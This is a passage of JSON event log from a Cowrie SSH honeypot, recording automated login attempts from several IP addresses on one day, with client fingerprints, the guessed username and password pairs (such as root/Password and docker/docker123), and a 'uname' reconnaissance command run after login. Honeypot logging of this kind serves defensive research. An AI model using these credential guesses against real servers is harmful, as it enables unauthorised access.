com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:50.313731Z","src_ip":"45.125.211.194","session":"937ad38f3dd7"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab123","message":"login attempt [gitlab/gitlab123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:51.133986Z","src_ip":"45.125.211.194","session":"937ad38f3dd7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:52.345486Z","src_ip":"45.125.211.194","session":"937ad38f3dd7"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":23300,"dst_ip":"1.2.3.4","dst_port":22,"session":"33606d41d8b6","protocol":"ssh","message":"New connection: 45.125.211.194:23300 (1.2.3.4:22) [session: 33606d41d8b6]","sensor":"my-vps","timestamp":"2025-08-28T03:33:05.038833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:05.057462Z","src_ip":"45.125.211.194","session":"33606d41d8b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:05.254230Z","src_ip":"45.125.211.194","session":"33606d41d8b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40730,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bbd63ed1e9c","protocol":"ssh","message":"New connection: 212.227.235.229:40730 (1.2.3.4:22) [session: 6bbd63ed1e9c]","sensor":"my-vps","timestamp":"2025-08-28T03:33:05.752948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:05.753704Z","src_ip":"212.227.235.229","session":"6bbd63ed1e9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:06.006081Z","src_ip":"212.227.235.229","session":"6bbd63ed1e9c"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:33:06.082517Z","src_ip":"45.125.211.194","session":"33606d41d8b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:33:06.596443Z","src_ip":"45.125.211.194","session":"33606d41d8b6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:33:06.597120Z","src_ip":"45.125.211.194","session":"33606d41d8b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:06.808324Z","src_ip":"45.125.211.194","session":"33606d41d8b6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:06.809376Z","src_ip":"45.125.211.194","session":"33606d41d8b6"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:06.851211Z","src_ip":"212.227.235.229","session":"6bbd63ed1e9c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:08.106378Z","src_ip":"212.227.235.229","session":"6bbd63ed1e9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50722,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a0990f8e870","protocol":"ssh","message":"New connection: 212.227.125.160:50722 (1.2.3.4:22) [session: 6a0990f8e870]","sensor":"my-vps","timestamp":"2025-08-28T03:33:14.384194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:14.385209Z","src_ip":"212.227.125.160","session":"6a0990f8e870"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:14.600490Z","src_ip":"212.227.125.160","session":"6a0990f8e870"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:33:15.463462Z","src_ip":"212.227.125.160","session":"6a0990f8e870"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:33:15.971497Z","src_ip":"212.227.125.160","session":"6a0990f8e870"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:33:15.972202Z","src_ip":"212.227.125.160","session":"6a0990f8e870"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:16.189513Z","src_ip":"212.227.125.160","session":"6a0990f8e870"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:16.190582Z","src_ip":"212.227.125.160","session":"6a0990f8e870"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":40247,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aae3a6e7046","protocol":"ssh","message":"New connection: 45.125.211.194:40247 (1.2.3.4:22) [session: 4aae3a6e7046]","sensor":"my-vps","timestamp":"2025-08-28T03:33:19.950402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:19.979919Z","src_ip":"45.125.211.194","session":"4aae3a6e7046"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:20.161705Z","src_ip":"45.125.211.194","session":"4aae3a6e7046"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:20.997744Z","src_ip":"45.125.211.194","session":"4aae3a6e7046"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:22.209105Z","src_ip":"45.125.211.194","session":"4aae3a6e7046"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54252,"dst_ip":"1.2.3.4","dst_port":22,"session":"6543f8738d44","protocol":"ssh","message":"New connection: 212.227.235.229:54252 (1.2.3.4:22) [session: 6543f8738d44]","sensor":"my-vps","timestamp":"2025-08-28T03:33:28.694482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:28.695459Z","src_ip":"212.227.235.229","session":"6543f8738d44"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:28.944893Z","src_ip":"212.227.235.229","session":"6543f8738d44"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:29.695659Z","src_ip":"212.227.235.229","session":"6543f8738d44"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:30.947988Z","src_ip":"212.227.235.229","session":"6543f8738d44"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":40801,"dst_ip":"1.2.3.4","dst_port":22,"session":"494f6a6b3544","protocol":"ssh","message":"New connection: 45.125.211.194:40801 (1.2.3.4:22) [session: 494f6a6b3544]","sensor":"my-vps","timestamp":"2025-08-28T03:33:34.803021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:34.826338Z","src_ip":"45.125.211.194","session":"494f6a6b3544"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:35.014515Z","src_ip":"45.125.211.194","session":"494f6a6b3544"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:35.842804Z","src_ip":"45.125.211.194","session":"494f6a6b3544"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:37.053815Z","src_ip":"45.125.211.194","session":"494f6a6b3544"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36014,"dst_ip":"1.2.3.4","dst_port":22,"session":"34c5557df020","protocol":"ssh","message":"New connection: 212.227.125.160:36014 (1.2.3.4:22) [session: 34c5557df020]","sensor":"my-vps","timestamp":"2025-08-28T03:33:37.811229Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:37.812968Z","src_ip":"212.227.125.160","session":"34c5557df020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56512,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ae7b969f958","protocol":"ssh","message":"New connection: 212.227.235.229:56512 (1.2.3.4:22) [session: 0ae7b969f958]","sensor":"my-vps","timestamp":"2025-08-28T03:33:38.470095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:38.471111Z","src_ip":"212.227.235.229","session":"0ae7b969f958"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:33:38.578853Z","src_ip":"212.227.235.229","session":"0ae7b969f958"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay1","message":"login attempt [clay/clay1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:38.903193Z","src_ip":"212.227.235.229","session":"0ae7b969f958"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:40.013319Z","src_ip":"212.227.235.229","session":"0ae7b969f958"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46898,"dst_ip":"1.2.3.4","dst_port":22,"session":"43f7ed0d99c1","protocol":"ssh","message":"New connection: 212.227.235.229:46898 (1.2.3.4:22) [session: 43f7ed0d99c1]","sensor":"my-vps","timestamp":"2025-08-28T03:33:40.654230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:40.655033Z","src_ip":"212.227.235.229","session":"43f7ed0d99c1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:33:40.905644Z","src_ip":"212.227.235.229","session":"43f7ed0d99c1"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:33:41.659738Z","src_ip":"212.227.235.229","session":"43f7ed0d99c1"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:42.369807Z","src_ip":"212.227.125.160","session":"7d82a1b8ad5a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:33:42.911784Z","src_ip":"212.227.235.229","session":"43f7ed0d99c1"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":55981,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa1e37eb062d","protocol":"ssh","message":"New connection: 45.125.211.194:55981 (1.2.3.4:22) [session: fa1e37eb062d]","sensor":"my-vps","timestamp":"2025-08-28T03:33:49.545346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:33:49.557809Z","src_ip":"45.125.211.194","session":"fa1e37eb062d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 